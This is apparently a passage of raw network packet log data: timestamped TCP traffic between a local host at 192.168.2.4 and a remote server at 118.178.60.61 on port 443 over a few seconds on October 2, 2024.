Oct 2, 2024 04:28:27.618645906 CEST	443	49748	118.178.60.61	192.168.2.4
Oct 2, 2024 04:28:27.618685961 CEST	49748	443	192.168.2.4	118.178.60.61
Oct 2, 2024 04:28:27.622874022 CEST	443	49748	118.178.60.61	192.168.2.4
Oct 2, 2024 04:28:27.622914076 CEST	49748	443	192.168.2.4	118.178.60.61
Oct 2, 2024 04:28:27.622932911 CEST	443	49748	118.178.60.61	192.168.2.4
Oct 2, 2024 04:28:27.622973919 CEST	49748	443	192.168.2.4	118.178.60.61
Oct 2, 2024 04:28:27.627933979 CEST	443	49748	118.178.60.61	192.168.2.4
Oct 2, 2024 04:28:27.627990961 CEST	49748	443	192.168.2.4	118.178.60.61
Oct 2, 2024 04:28:27.628047943 CEST	443	49748	118.178.60.61	192.168.2.4
Oct 2, 2024 04:28:27.628102064 CEST	49748	443	192.168.2.4	118.178.60.61
Oct 2, 2024 04:28:27.632746935 CEST	443	49748	118.178.60.61	192.168.2.4
Oct 2, 2024 04:28:27.632786989 CEST	49748	443	192.168.2.4	118.178.60.61
Oct 2, 2024 04:28:27.632944107 CEST	443	49748	118.178.60.61	192.168.2.4
Oct 2, 2024 04:28:27.632996082 CEST	49748	443	192.168.2.4	118.178.60.61
Oct 2, 2024 04:28:27.642582893 CEST	443	49748	118.178.60.61	192.168.2.4
Oct 2, 2024 04:28:27.642628908 CEST	443	49748	118.178.60.61	192.168.2.4
Oct 2, 2024 04:28:27.642628908 CEST	49748	443	192.168.2.4	118.178.60.61
Oct 2, 2024 04:28:27.642642975 CEST	443	49748	118.178.60.61	192.168.2.4
Oct 2, 2024 04:28:27.642669916 CEST	49748	443	192.168.2.4	118.178.60.61
Oct 2, 2024 04:28:27.642683029 CEST	49748	443	192.168.2.4	118.178.60.61
Oct 2, 2024 04:28:27.652160883 CEST	443	49748	118.178.60.61	192.168.2.4
Oct 2, 2024 04:28:27.652209044 CEST	49748	443	192.168.2.4	118.178.60.61
Oct 2, 2024 04:28:27.652259111 CEST	443	49748	118.178.60.61	192.168.2.4
Oct 2, 2024 04:28:27.652308941 CEST	49748	443	192.168.2.4	118.178.60.61
Oct 2, 2024 04:28:27.660747051 CEST	443	49748	118.178.60.61	192.168.2.4
Oct 2, 2024 04:28:27.660801888 CEST	49748	443	192.168.2.4	118.178.60.61
Oct 2, 2024 04:28:27.660854101 CEST	443	49748	118.178.60.61	192.168.2.4
Oct 2, 2024 04:28:27.660891056 CEST	49748	443	192.168.2.4	118.178.60.61
Oct 2, 2024 04:28:27.665630102 CEST	443	49748	118.178.60.61	192.168.2.4
Oct 2, 2024 04:28:27.665678978 CEST	49748	443	192.168.2.4	118.178.60.61
Oct 2, 2024 04:28:27.665776968 CEST	443	49748	118.178.60.61	192.168.2.4
Oct 2, 2024 04:28:27.665824890 CEST	49748	443	192.168.2.4	118.178.60.61
Oct 2, 2024 04:28:27.670387030 CEST	443	49748	118.178.60.61	192.168.2.4
Oct 2, 2024 04:28:27.670439005 CEST	49748	443	192.168.2.4	118.178.60.61
Oct 2, 2024 04:28:27.670523882 CEST	443	49748	118.178.60.61	192.168.2.4
Oct 2, 2024 04:28:27.670568943 CEST	49748	443	192.168.2.4	118.178.60.61
Oct 2, 2024 04:28:27.675982952 CEST	443	49748	118.178.60.61	192.168.2.4
Oct 2, 2024 04:28:27.676033974 CEST	49748	443	192.168.2.4	118.178.60.61
Oct 2, 2024 04:28:27.676213026 CEST	443	49748	118.178.60.61	192.168.2.4
Oct 2, 2024 04:28:27.676253080 CEST	49748	443	192.168.2.4	118.178.60.61
Oct 2, 2024 04:28:27.680331945 CEST	443	49748	118.178.60.61	192.168.2.4
Oct 2, 2024 04:28:27.680383921 CEST	49748	443	192.168.2.4	118.178.60.61
Oct 2, 2024 04:28:27.680433035 CEST	443	49748	118.178.60.61	192.168.2.4
Oct 2, 2024 04:28:27.680470943 CEST	49748	443	192.168.2.4	118.178.60.61
Oct 2, 2024 04:28:27.684135914 CEST	443	49748	118.178.60.61	192.168.2.4
Oct 2, 2024 04:28:27.684180975 CEST	49748	443	192.168.2.4	118.178.60.61
Oct 2, 2024 04:28:27.684312105 CEST	443	49748	118.178.60.61	192.168.2.4
Oct 2, 2024 04:28:27.684350967 CEST	49748	443	192.168.2.4	118.178.60.61
Oct 2, 2024 04:28:27.691591024 CEST	443	49748	118.178.60.61	192.168.2.4
Oct 2, 2024 04:28:27.691680908 CEST	49748	443	192.168.2.4	118.178.60.61
Oct 2, 2024 04:28:27.691735983 CEST	443	49748	118.178.60.61	192.168.2.4
Oct 2, 2024 04:28:27.691781998 CEST	49748	443	192.168.2.4	118.178.60.61
Oct 2, 2024 04:28:27.697348118 CEST	443	49748	118.178.60.61	192.168.2.4
Oct 2, 2024 04:28:27.697397947 CEST	49748	443	192.168.2.4	118.178.60.61
Oct 2, 2024 04:28:27.697709084 CEST	443	49748	118.178.60.61	192.168.2.4
Oct 2, 2024 04:28:27.697753906 CEST	49748	443	192.168.2.4	118.178.60.61
Oct 2, 2024 04:28:27.699203968 CEST	443	49748	118.178.60.61	192.168.2.4
Oct 2, 2024 04:28:27.699259043 CEST	49748	443	192.168.2.4	118.178.60.61
Oct 2, 2024 04:28:27.699364901 CEST	443	49748	118.178.60.61	192.168.2.4
Oct 2, 2024 04:28:27.699415922 CEST	49748	443	192.168.2.4	118.178.60.61
Oct 2, 2024 04:28:27.702374935 CEST	443	49748	118.178.60.61	192.168.2.4
Oct 2, 2024 04:28:27.702424049 CEST	49748	443	192.168.2.4	118.178.60.61
Oct 2, 2024 04:28:27.702428102 CEST	443	49748	118.178.60.61	192.168.2.4
Oct 2, 2024 04:28:27.702441931 CEST	443	49748	118.178.60.61	192.168.2.4
Oct 2, 2024 04:28:27.702467918 CEST	49748	443	192.168.2.4	118.178.60.61
Oct 2, 2024 04:28:27.702482939 CEST	49748	443	192.168.2.4	118.178.60.61
Oct 2, 2024 04:28:27.705535889 CEST	443	49748	118.178.60.61	192.168.2.4
Oct 2, 2024 04:28:27.705585957 CEST	49748	443	192.168.2.4	118.178.60.61
Oct 2, 2024 04:28:27.705624104 CEST	443	49748	118.178.60.61	192.168.2.4
Oct 2, 2024 04:28:27.705663919 CEST	49748	443	192.168.2.4	118.178.60.61
Oct 2, 2024 04:28:27.709796906 CEST	443	49748	118.178.60.61	192.168.2.4
Oct 2, 2024 04:28:27.709841013 CEST	49748	443	192.168.2.4	118.178.60.61
Oct 2, 2024 04:28:27.709990978 CEST	443	49748	118.178.60.61	192.168.2.4
Oct 2, 2024 04:28:27.710025072 CEST	49748	443	192.168.2.4	118.178.60.61
Oct 2, 2024 04:28:27.710041046 CEST	49748	443	192.168.2.4	118.178.60.61
Oct 2, 2024 04:28:27.715261936 CEST	443	49748	118.178.60.61	192.168.2.4
Oct 2, 2024 04:28:27.715311050 CEST	49748	443	192.168.2.4	118.178.60.61
Oct 2, 2024 04:28:27.715393066 CEST	443	49748	118.178.60.61	192.168.2.4
Oct 2, 2024 04:28:27.715434074 CEST	49748	443	192.168.2.4	118.178.60.61
Oct 2, 2024 04:28:27.721424103 CEST	443	49748	118.178.60.61	192.168.2.4
Oct 2, 2024 04:28:27.721473932 CEST	49748	443	192.168.2.4	118.178.60.61
Oct 2, 2024 04:28:27.721484900 CEST	443	49748	118.178.60.61	192.168.2.4
Oct 2, 2024 04:28:27.721523046 CEST	49748	443	192.168.2.4	118.178.60.61
Oct 2, 2024 04:28:27.817426920 CEST	49748	443	192.168.2.4	118.178.60.61
Oct 2, 2024 04:28:27.817442894 CEST	443	49748	118.178.60.61	192.168.2.4
Oct 2, 2024 04:28:27.817495108 CEST	49748	443	192.168.2.4	118.178.60.61
Oct 2, 2024 04:28:27.903346062 CEST	49748	443	192.168.2.4	118.178.60.61
Oct 2, 2024 04:28:27.903356075 CEST	443	49748	118.178.60.61	192.168.2.4
Oct 2, 2024 04:28:27.903367043 CEST	443	49748	118.178.60.61	192.168.2.4
Oct 2, 2024 04:28:27.903373957 CEST	443	49748	118.178.60.61	192.168.2.4
Oct 2, 2024 04:28:27.903430939 CEST	49748	443	192.168.2.4	118.178.60.61
Oct 2, 2024 04:28:27.903435946 CEST	443	49748	118.178.60.61	192.168.2.4
Oct 2, 2024 04:28:27.903454065 CEST	443	49748	118.178.60.61	192.168.2.4
Oct 2, 2024 04:28:27.903516054 CEST	49748	443	192.168.2.4	118.178.60.61
Oct 2, 2024 04:28:27.903523922 CEST	443	49748	118.178.60.61	192.168.2.4
Oct 2, 2024 04:28:27.903532028 CEST	443	49748	118.178.60.61	192.168.2.4
Oct 2, 2024 04:28:27.903542042 CEST	443	49748	118.178.60.61	192.168.2.4
Oct 2, 2024 04:28:27.903553963 CEST	443	49748	118.178.60.61	192.168.2.4
Oct 2, 2024 04:28:27.903584003 CEST	49748	443	192.168.2.4	118.178.60.61
Oct 2, 2024 04:28:27.903598070 CEST	443	49748	118.178.60.61	192.168.2.4
Oct 2, 2024 04:28:27.903633118 CEST	49748	443	192.168.2.4	118.178.60.61
Oct 2, 2024 04:28:27.903641939 CEST	443	49748	118.178.60.61	192.168.2.4
Oct 2, 2024 04:28:27.903671980 CEST	443	49748	118.178.60.61	192.168.2.4
Oct 2, 2024 04:28:27.903709888 CEST	443	49748	118.178.60.61	192.168.2.4
Oct 2, 2024 04:28:27.903712034 CEST	49748	443	192.168.2.4	118.178.60.61
Oct 2, 2024 04:28:27.903727055 CEST	443	49748	118.178.60.61	192.168.2.4
Oct 2, 2024 04:28:27.903743029 CEST	49748	443	192.168.2.4	118.178.60.61
Oct 2, 2024 04:28:27.903750896 CEST	443	49748	118.178.60.61	192.168.2.4
Oct 2, 2024 04:28:27.903763056 CEST	443	49748	118.178.60.61	192.168.2.4
Oct 2, 2024 04:28:27.903776884 CEST	49748	443	192.168.2.4	118.178.60.61
Oct 2, 2024 04:28:27.903780937 CEST	443	49748	118.178.60.61	192.168.2.4
Oct 2, 2024 04:28:27.903795004 CEST	443	49748	118.178.60.61	192.168.2.4
Oct 2, 2024 04:28:27.903809071 CEST	49748	443	192.168.2.4	118.178.60.61
Oct 2, 2024 04:28:27.903822899 CEST	443	49748	118.178.60.61	192.168.2.4
Oct 2, 2024 04:28:27.903837919 CEST	49748	443	192.168.2.4	118.178.60.61
Oct 2, 2024 04:28:27.903839111 CEST	443	49748	118.178.60.61	192.168.2.4
Oct 2, 2024 04:28:27.903853893 CEST	443	49748	118.178.60.61	192.168.2.4
Oct 2, 2024 04:28:27.903867006 CEST	49748	443	192.168.2.4	118.178.60.61
Oct 2, 2024 04:28:27.903870106 CEST	443	49748	118.178.60.61	192.168.2.4
Oct 2, 2024 04:28:27.903886080 CEST	49748	443	192.168.2.4	118.178.60.61
Oct 2, 2024 04:28:27.903894901 CEST	49748	443	192.168.2.4	118.178.60.61
Oct 2, 2024 04:28:27.903904915 CEST	443	49748	118.178.60.61	192.168.2.4
Oct 2, 2024 04:28:27.903918028 CEST	49748	443	192.168.2.4	118.178.60.61
Oct 2, 2024 04:28:27.903928041 CEST	443	49748	118.178.60.61	192.168.2.4
Oct 2, 2024 04:28:27.903956890 CEST	49748	443	192.168.2.4	118.178.60.61
Oct 2, 2024 04:28:27.903975964 CEST	49748	443	192.168.2.4	118.178.60.61
Oct 2, 2024 04:28:28.111450911 CEST	443	49748	118.178.60.61	192.168.2.4
Oct 2, 2024 04:28:28.111697912 CEST	49748	443	192.168.2.4	118.178.60.61
Oct 2, 2024 04:28:28.539442062 CEST	443	49748	118.178.60.61	192.168.2.4
Oct 2, 2024 04:28:28.541690111 CEST	49748	443	192.168.2.4	118.178.60.61
Oct 2, 2024 04:28:28.845185995 CEST	49748	443	192.168.2.4	118.178.60.61
Oct 2, 2024 04:28:28.845206976 CEST	443	49748	118.178.60.61	192.168.2.4
Oct 2, 2024 04:28:28.845216990 CEST	443	49748	118.178.60.61	192.168.2.4
Oct 2, 2024 04:28:28.845274925 CEST	49748	443	192.168.2.4	118.178.60.61
Oct 2, 2024 04:28:28.845280886 CEST	443	49748	118.178.60.61	192.168.2.4
Oct 2, 2024 04:28:28.845299959 CEST	443	49748	118.178.60.61	192.168.2.4
Oct 2, 2024 04:28:28.845331907 CEST	49748	443	192.168.2.4	118.178.60.61
Oct 2, 2024 04:28:28.845350027 CEST	443	49748	118.178.60.61	192.168.2.4
Oct 2, 2024 04:28:28.845369101 CEST	49748	443	192.168.2.4	118.178.60.61
Oct 2, 2024 04:28:28.845377922 CEST	443	49748	118.178.60.61	192.168.2.4
Oct 2, 2024 04:28:28.845390081 CEST	443	49748	118.178.60.61	192.168.2.4
Oct 2, 2024 04:28:28.845417976 CEST	49748	443	192.168.2.4	118.178.60.61
Oct 2, 2024 04:28:28.845423937 CEST	443	49748	118.178.60.61	192.168.2.4
Oct 2, 2024 04:28:28.845469952 CEST	49748	443	192.168.2.4	118.178.60.61
Oct 2, 2024 04:28:28.845478058 CEST	443	49748	118.178.60.61	192.168.2.4
Oct 2, 2024 04:28:28.845496893 CEST	443	49748	118.178.60.61	192.168.2.4
Oct 2, 2024 04:28:28.845504999 CEST	49748	443	192.168.2.4	118.178.60.61
Oct 2, 2024 04:28:28.845509052 CEST	443	49748	118.178.60.61	192.168.2.4
Oct 2, 2024 04:28:28.845530033 CEST	443	49748	118.178.60.61	192.168.2.4
Oct 2, 2024 04:28:28.845622063 CEST	49748	443	192.168.2.4	118.178.60.61
Oct 2, 2024 04:28:28.845671892 CEST	49748	443	192.168.2.4	118.178.60.61
Oct 2, 2024 04:28:29.051410913 CEST	443	49748	118.178.60.61	192.168.2.4
Oct 2, 2024 04:28:29.052411079 CEST	49748	443	192.168.2.4	118.178.60.61
Oct 2, 2024 04:28:29.079941988 CEST	49748	443	192.168.2.4	118.178.60.61
Oct 2, 2024 04:28:29.079961061 CEST	443	49748	118.178.60.61	192.168.2.4
Oct 2, 2024 04:28:29.080020905 CEST	49748	443	192.168.2.4	118.178.60.61
Oct 2, 2024 04:28:29.104033947 CEST	49748	443	192.168.2.4	118.178.60.61
Oct 2, 2024 04:28:29.104039907 CEST	443	49748	118.178.60.61	192.168.2.4
Oct 2, 2024 04:28:29.104067087 CEST	443	49748	118.178.60.61	192.168.2.4
Oct 2, 2024 04:28:29.104301929 CEST	49748	443	192.168.2.4	118.178.60.61
Oct 2, 2024 04:28:29.104305983 CEST	443	49748	118.178.60.61	192.168.2.4
Oct 2, 2024 04:28:29.104315996 CEST	443	49748	118.178.60.61	192.168.2.4
Oct 2, 2024 04:28:29.104326010 CEST	443	49748	118.178.60.61	192.168.2.4
Oct 2, 2024 04:28:29.104434013 CEST	49748	443	192.168.2.4	118.178.60.61
Oct 2, 2024 04:28:29.104439020 CEST	443	49748	118.178.60.61	192.168.2.4
Oct 2, 2024 04:28:29.104453087 CEST	443	49748	118.178.60.61	192.168.2.4
Oct 2, 2024 04:28:29.104466915 CEST	443	49748	118.178.60.61	192.168.2.4
Oct 2, 2024 04:28:29.104470968 CEST	443	49748	118.178.60.61	192.168.2.4
Oct 2, 2024 04:28:29.104537964 CEST	49748	443	192.168.2.4	118.178.60.61
Oct 2, 2024 04:28:29.104542017 CEST	443	49748	118.178.60.61	192.168.2.4
Oct 2, 2024 04:28:29.104593992 CEST	49748	443	192.168.2.4	118.178.60.61
Oct 2, 2024 04:28:29.104599953 CEST	443	49748	118.178.60.61	192.168.2.4
Oct 2, 2024 04:28:29.104652882 CEST	49748	443	192.168.2.4	118.178.60.61
Oct 2, 2024 04:28:29.104682922 CEST	49748	443	192.168.2.4	118.178.60.61
Oct 2, 2024 04:28:29.279279947 CEST	49748	443	192.168.2.4	118.178.60.61
Oct 2, 2024 04:28:29.279292107 CEST	443	49748	118.178.60.61	192.168.2.4
Oct 2, 2024 04:28:29.279365063 CEST	49748	443	192.168.2.4	118.178.60.61
Oct 2, 2024 04:28:29.306272030 CEST	49748	443	192.168.2.4	118.178.60.61
Oct 2, 2024 04:28:29.306277037 CEST	443	49748	118.178.60.61	192.168.2.4
Oct 2, 2024 04:28:29.306293011 CEST	443	49748	118.178.60.61	192.168.2.4
Oct 2, 2024 04:28:29.306307077 CEST	443	49748	118.178.60.61	192.168.2.4
Oct 2, 2024 04:28:29.306323051 CEST	443	49748	118.178.60.61	192.168.2.4
Oct 2, 2024 04:28:29.306396008 CEST	49748	443	192.168.2.4	118.178.60.61
Oct 2, 2024 04:28:29.306401014 CEST	443	49748	118.178.60.61	192.168.2.4
Oct 2, 2024 04:28:29.306514025 CEST	49748	443	192.168.2.4	118.178.60.61
Oct 2, 2024 04:28:29.306570053 CEST	49748	443	192.168.2.4	118.178.60.61
Oct 2, 2024 04:28:29.306576967 CEST	443	49748	118.178.60.61	192.168.2.4
Oct 2, 2024 04:28:29.306641102 CEST	49748	443	192.168.2.4	118.178.60.61
Oct 2, 2024 04:28:29.515423059 CEST	443	49748	118.178.60.61	192.168.2.4
Oct 2, 2024 04:28:29.517812014 CEST	49748	443	192.168.2.4	118.178.60.61
Oct 2, 2024 04:28:29.533163071 CEST	49748	443	192.168.2.4	118.178.60.61
Oct 2, 2024 04:28:29.533174992 CEST	443	49748	118.178.60.61	192.168.2.4
Oct 2, 2024 04:28:29.533245087 CEST	49748	443	192.168.2.4	118.178.60.61
Oct 2, 2024 04:28:29.563885927 CEST	49748	443	192.168.2.4	118.178.60.61
Oct 2, 2024 04:28:29.563893080 CEST	443	49748	118.178.60.61	192.168.2.4
Oct 2, 2024 04:28:29.563904047 CEST	443	49748	118.178.60.61	192.168.2.4
Oct 2, 2024 04:28:29.563910007 CEST	443	49748	118.178.60.61	192.168.2.4
Oct 2, 2024 04:28:29.564014912 CEST	49748	443	192.168.2.4	118.178.60.61
Oct 2, 2024 04:28:29.564019918 CEST	443	49748	118.178.60.61	192.168.2.4
Oct 2, 2024 04:28:29.564048052 CEST	443	49748	118.178.60.61	192.168.2.4
Oct 2, 2024 04:28:29.564058065 CEST	443	49748	118.178.60.61	192.168.2.4
Oct 2, 2024 04:28:29.564085007 CEST	49748	443	192.168.2.4	118.178.60.61
Oct 2, 2024 04:28:29.564088106 CEST	443	49748	118.178.60.61	192.168.2.4
Oct 2, 2024 04:28:29.564177036 CEST	49748	443	192.168.2.4	118.178.60.61
Oct 2, 2024 04:28:29.564182997 CEST	443	49748	118.178.60.61	192.168.2.4
Oct 2, 2024 04:28:29.564201117 CEST	443	49748	118.178.60.61	192.168.2.4
Oct 2, 2024 04:28:29.564342976 CEST	49748	443	192.168.2.4	118.178.60.61
Oct 2, 2024 04:28:29.564348936 CEST	443	49748	118.178.60.61	192.168.2.4
Oct 2, 2024 04:28:29.564382076 CEST	49748	443	192.168.2.4	118.178.60.61
Oct 2, 2024 04:28:29.564413071 CEST	49748	443	192.168.2.4	118.178.60.61
Oct 2, 2024 04:28:29.775420904 CEST	443	49748	118.178.60.61	192.168.2.4
Oct 2, 2024 04:28:29.777559996 CEST	49748	443	192.168.2.4	118.178.60.61
Oct 2, 2024 04:28:29.828356028 CEST	49748	443	192.168.2.4	118.178.60.61
Oct 2, 2024 04:28:29.828365088 CEST	443	49748	118.178.60.61	192.168.2.4
Oct 2, 2024 04:28:29.828439951 CEST	49748	443	192.168.2.4	118.178.60.61
Oct 2, 2024 04:28:29.865869045 CEST	49748	443	192.168.2.4	118.178.60.61
Oct 2, 2024 04:28:29.865881920 CEST	443	49748	118.178.60.61	192.168.2.4
Oct 2, 2024 04:28:29.865901947 CEST	443	49748	118.178.60.61	192.168.2.4
Oct 2, 2024 04:28:29.865917921 CEST	443	49748	118.178.60.61	192.168.2.4
Oct 2, 2024 04:28:29.865921974 CEST	443	49748	118.178.60.61	192.168.2.4
Oct 2, 2024 04:28:29.866020918 CEST	49748	443	192.168.2.4	118.178.60.61
Oct 2, 2024 04:28:29.866027117 CEST	443	49748	118.178.60.61	192.168.2.4
Oct 2, 2024 04:28:29.866060972 CEST	443	49748	118.178.60.61	192.168.2.4
Oct 2, 2024 04:28:29.866091967 CEST	49748	443	192.168.2.4	118.178.60.61
Oct 2, 2024 04:28:29.866197109 CEST	49748	443	192.168.2.4	118.178.60.61
Oct 2, 2024 04:28:29.866203070 CEST	443	49748	118.178.60.61	192.168.2.4
Oct 2, 2024 04:28:29.866230011 CEST	49748	443	192.168.2.4	118.178.60.61
Oct 2, 2024 04:28:29.866272926 CEST	49748	443	192.168.2.4	118.178.60.61
Oct 2, 2024 04:28:30.071417093 CEST	443	49748	118.178.60.61	192.168.2.4
Oct 2, 2024 04:28:30.071520090 CEST	49748	443	192.168.2.4	118.178.60.61
Oct 2, 2024 04:28:30.146209955 CEST	49748	443	192.168.2.4	118.178.60.61
Oct 2, 2024 04:28:30.146240950 CEST	443	49748	118.178.60.61	192.168.2.4
Oct 2, 2024 04:28:30.146262884 CEST	443	49748	118.178.60.61	192.168.2.4
Oct 2, 2024 04:28:30.146277905 CEST	443	49748	118.178.60.61	192.168.2.4
Oct 2, 2024 04:28:30.146286964 CEST	443	49748	118.178.60.61	192.168.2.4
Oct 2, 2024 04:28:30.146446943 CEST	49748	443	192.168.2.4	118.178.60.61
Oct 2, 2024 04:28:30.146456003 CEST	443	49748	118.178.60.61	192.168.2.4
Oct 2, 2024 04:28:30.146481037 CEST	443	49748	118.178.60.61	192.168.2.4
Oct 2, 2024 04:28:30.146506071 CEST	49748	443	192.168.2.4	118.178.60.61
Oct 2, 2024 04:28:30.146512032 CEST	443	49748	118.178.60.61	192.168.2.4
Oct 2, 2024 04:28:30.146637917 CEST	49748	443	192.168.2.4	118.178.60.61
Oct 2, 2024 04:28:30.146714926 CEST	49748	443	192.168.2.4	118.178.60.61
Oct 2, 2024 04:28:30.351416111 CEST	443	49748	118.178.60.61	192.168.2.4
Oct 2, 2024 04:28:30.351473093 CEST	49748	443	192.168.2.4	118.178.60.61
Oct 2, 2024 04:28:30.522730112 CEST	49748	443	192.168.2.4	118.178.60.61
Oct 2, 2024 04:28:30.522773981 CEST	443	49748	118.178.60.61	192.168.2.4
Oct 2, 2024 04:28:30.522798061 CEST	443	49748	118.178.60.61	192.168.2.4
Oct 2, 2024 04:28:30.522892952 CEST	49748	443	192.168.2.4	118.178.60.61
Oct 2, 2024 04:28:30.564538956 CEST	49748	443	192.168.2.4	118.178.60.61
Oct 2, 2024 04:28:30.564553022 CEST	443	49748	118.178.60.61	192.168.2.4
Oct 2, 2024 04:28:30.564572096 CEST	443	49748	118.178.60.61	192.168.2.4
Oct 2, 2024 04:28:30.564577103 CEST	443	49748	118.178.60.61	192.168.2.4
Oct 2, 2024 04:28:30.564764023 CEST	49748	443	192.168.2.4	118.178.60.61
Oct 2, 2024 04:28:30.564769983 CEST	443	49748	118.178.60.61	192.168.2.4
Oct 2, 2024 04:28:30.564779997 CEST	443	49748	118.178.60.61	192.168.2.4
Oct 2, 2024 04:28:30.564805031 CEST	49748	443	192.168.2.4	118.178.60.61
Oct 2, 2024 04:28:30.564809084 CEST	443	49748	118.178.60.61	192.168.2.4
Oct 2, 2024 04:28:30.564924002 CEST	49748	443	192.168.2.4	118.178.60.61
Oct 2, 2024 04:28:30.564965010 CEST	49748	443	192.168.2.4	118.178.60.61
Oct 2, 2024 04:28:30.771445036 CEST	443	49748	118.178.60.61	192.168.2.4
Oct 2, 2024 04:28:30.771518946 CEST	49748	443	192.168.2.4	118.178.60.61
Oct 2, 2024 04:28:30.915038109 CEST	49748	443	192.168.2.4	118.178.60.61
Oct 2, 2024 04:28:30.915059090 CEST	443	49748	118.178.60.61	192.168.2.4
Oct 2, 2024 04:28:30.915079117 CEST	443	49748	118.178.60.61	192.168.2.4
Oct 2, 2024 04:28:30.915155888 CEST	49748	443	192.168.2.4	118.178.60.61
Oct 2, 2024 04:28:30.965523005 CEST	49748	443	192.168.2.4	118.178.60.61
Oct 2, 2024 04:28:30.965536118 CEST	443	49748	118.178.60.61	192.168.2.4
Oct 2, 2024 04:28:30.965555906 CEST	443	49748	118.178.60.61	192.168.2.4
Oct 2, 2024 04:28:30.965559959 CEST	443	49748	118.178.60.61	192.168.2.4
Oct 2, 2024 04:28:30.965682030 CEST	49748	443	192.168.2.4	118.178.60.61
Oct 2, 2024 04:28:30.965688944 CEST	443	49748	118.178.60.61	192.168.2.4
Oct 2, 2024 04:28:30.965699911 CEST	443	49748	118.178.60.61	192.168.2.4
Oct 2, 2024 04:28:30.965722084 CEST	49748	443	192.168.2.4	118.178.60.61
Oct 2, 2024 04:28:30.965725899 CEST	443	49748	118.178.60.61	192.168.2.4
Oct 2, 2024 04:28:30.965783119 CEST	49748	443	192.168.2.4	118.178.60.61
Oct 2, 2024 04:28:30.965853930 CEST	49748	443	192.168.2.4	118.178.60.61
Oct 2, 2024 04:28:31.175410032 CEST	443	49748	118.178.60.61	192.168.2.4
Oct 2, 2024 04:28:31.175527096 CEST	49748	443	192.168.2.4	118.178.60.61
Oct 2, 2024 04:28:31.391278028 CEST	49748	443	192.168.2.4	118.178.60.61
Oct 2, 2024 04:28:31.391320944 CEST	443	49748	118.178.60.61	192.168.2.4
Oct 2, 2024 04:28:31.391345024 CEST	443	49748	118.178.60.61	192.168.2.4
Oct 2, 2024 04:28:31.391422033 CEST	49748	443	192.168.2.4	118.178.60.61
Oct 2, 2024 04:28:31.455400944 CEST	49748	443	192.168.2.4	118.178.60.61
Oct 2, 2024 04:28:31.455446005 CEST	443	49748	118.178.60.61	192.168.2.4
Oct 2, 2024 04:28:31.455482006 CEST	443	49748	118.178.60.61	192.168.2.4
Oct 2, 2024 04:28:31.455487013 CEST	443	49748	118.178.60.61	192.168.2.4
Oct 2, 2024 04:28:31.455781937 CEST	49748	443	192.168.2.4	118.178.60.61
Oct 2, 2024 04:28:31.455792904 CEST	443	49748	118.178.60.61	192.168.2.4
Oct 2, 2024 04:28:31.455804110 CEST	443	49748	118.178.60.61	192.168.2.4
Oct 2, 2024 04:28:31.455821991 CEST	443	49748	118.178.60.61	192.168.2.4
Oct 2, 2024 04:28:31.455873013 CEST	49748	443	192.168.2.4	118.178.60.61
Oct 2, 2024 04:28:31.455976963 CEST	49748	443	192.168.2.4	118.178.60.61
Oct 2, 2024 04:28:31.456012011 CEST	49748	443	192.168.2.4	118.178.60.61
Oct 2, 2024 04:28:31.667412996 CEST	443	49748	118.178.60.61	192.168.2.4
Oct 2, 2024 04:28:31.667699099 CEST	49748	443	192.168.2.4	118.178.60.61
Oct 2, 2024 04:28:31.896852016 CEST	49748	443	192.168.2.4	118.178.60.61
Oct 2, 2024 04:28:31.896898985 CEST	443	49748	118.178.60.61	192.168.2.4
Oct 2, 2024 04:28:31.896929026 CEST	443	49748	118.178.60.61	192.168.2.4
Oct 2, 2024 04:28:31.897054911 CEST	49748	443	192.168.2.4	118.178.60.61
Oct 2, 2024 04:28:31.952291012 CEST	49748	443	192.168.2.4	118.178.60.61
Oct 2, 2024 04:28:31.952327013 CEST	443	49748	118.178.60.61	192.168.2.4
Oct 2, 2024 04:28:31.952348948 CEST	443	49748	118.178.60.61	192.168.2.4
Oct 2, 2024 04:28:31.952353954 CEST	443	49748	118.178.60.61	192.168.2.4
Oct 2, 2024 04:28:31.952455997 CEST	49748	443	192.168.2.4	118.178.60.61
Oct 2, 2024 04:28:31.952467918 CEST	443	49748	118.178.60.61	192.168.2.4
Oct 2, 2024 04:28:31.952481985 CEST	443	49748	118.178.60.61	192.168.2.4
Oct 2, 2024 04:28:31.952502012 CEST	443	49748	118.178.60.61	192.168.2.4
Oct 2, 2024 04:28:31.952531099 CEST	49748	443	192.168.2.4	118.178.60.61
Oct 2, 2024 04:28:31.952636003 CEST	49748	443	192.168.2.4	118.178.60.61
Oct 2, 2024 04:28:31.952692986 CEST	49748	443	192.168.2.4	118.178.60.61
Oct 2, 2024 04:28:32.163424015 CEST	443	49748	118.178.60.61	192.168.2.4
Oct 2, 2024 04:28:32.163564920 CEST	49748	443	192.168.2.4	118.178.60.61
Oct 2, 2024 04:28:32.351952076 CEST	49748	443	192.168.2.4	118.178.60.61
Oct 2, 2024 04:28:32.351994991 CEST	443	49748	118.178.60.61	192.168.2.4
Oct 2, 2024 04:28:32.352066994 CEST	443	49748	118.178.60.61	192.168.2.4
Oct 2, 2024 04:28:32.352278948 CEST	49748	443	192.168.2.4	118.178.60.61
Oct 2, 2024 04:28:32.405985117 CEST	49748	443	192.168.2.4	118.178.60.61
Oct 2, 2024 04:28:32.406038046 CEST	443	49748	118.178.60.61	192.168.2.4
Oct 2, 2024 04:28:32.406079054 CEST	443	49748	118.178.60.61	192.168.2.4
Oct 2, 2024 04:28:32.406091928 CEST	443	49748	118.178.60.61	192.168.2.4
Oct 2, 2024 04:28:32.406099081 CEST	443	49748	118.178.60.61	192.168.2.4
Oct 2, 2024 04:28:32.406449080 CEST	49748	443	192.168.2.4	118.178.60.61
Oct 2, 2024 04:28:32.406460047 CEST	443	49748	118.178.60.61	192.168.2.4
Oct 2, 2024 04:28:32.406532049 CEST	443	49748	118.178.60.61	192.168.2.4
Oct 2, 2024 04:28:32.406589031 CEST	49748	443	192.168.2.4	118.178.60.61
Oct 2, 2024 04:28:32.406707048 CEST	49748	443	192.168.2.4	118.178.60.61
Oct 2, 2024 04:28:32.406761885 CEST	49748	443	192.168.2.4	118.178.60.61
Oct 2, 2024 04:28:32.615410089 CEST	443	49748	118.178.60.61	192.168.2.4
Oct 2, 2024 04:28:32.615508080 CEST	49748	443	192.168.2.4	118.178.60.61
Oct 2, 2024 04:28:32.852410078 CEST	49748	443	192.168.2.4	118.178.60.61
Oct 2, 2024 04:28:32.852469921 CEST	443	49748	118.178.60.61	192.168.2.4
Oct 2, 2024 04:28:32.852490902 CEST	443	49748	118.178.60.61	192.168.2.4
Oct 2, 2024 04:28:32.852576971 CEST	49748	443	192.168.2.4	118.178.60.61
